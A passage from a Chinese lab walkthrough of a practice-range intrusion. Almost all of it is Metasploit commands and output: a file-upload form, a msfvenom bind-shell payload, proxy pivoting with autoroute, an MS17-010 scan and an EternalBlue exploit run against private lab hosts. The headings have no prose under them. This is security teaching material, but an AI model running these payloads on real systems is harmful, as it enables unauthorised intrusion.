声明
长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。
0x01 前言
0x02 靶场拓扑
0x03 渗透过程
<formenctype="multipart/form-data"
action="http://192.168.128.135//admin.php/common/add_images.html"
method="post">
<input type="file" name="file"size="50"><br>
<input type="submit" value="Upload">
</form>
msfvenom -pwindows/x64/meterpreter/bind_tcp RHOST=192.168.20.140
RPORT=4444 -f exe >payload.exe
msf6 > useexploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp//建立正向监听
msf6 exploit(multi/handler) > set RHOST 192.168.20.130 //目标IP
msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口
msf6 exploit(multi/handler) > setg Proxies socks5:127.0.0.1:6000 //设置Socks5代理
msf6 exploit(multi/handler) > exploit
meterpreter > //成功获取WEB_2目标权限
meterpreter >run autoroute -s 192.168.30.0/24 //添加目标环境网络
meterpreter > background //保存session会话
[ ] Backgrounding session
msf6exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010 //使用ms17-010扫描模块
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.30.140 //目标主机
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.30.140:445 - Host is likely VULNERABLE to MS17-010! -Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Auxiliary module execution completed //目标主机存在ms17-010漏洞
msf6 auxiliary(scanner/smb/smb_ms17_010) >
msf6auxiliary(scanner/smb/smb_ms17_010) > useexploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.30.140//目标主机
msf6 exploit(windows/smb/ms17_010_eternalblue) >set LPORT 6601 //本地监听端口
msf6 exploit(windows/smb/ms17_010_eternalblue) >exploit
meterpreter > //成功获取系统权限
0x04 总结
0x05 参考链接
▇ 扫码关注我们 ▇
长白山攻防实验室
学习最新技术知识
原文始发于微信公众号(长白山攻防实验室):记一次内网靶场渗透WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论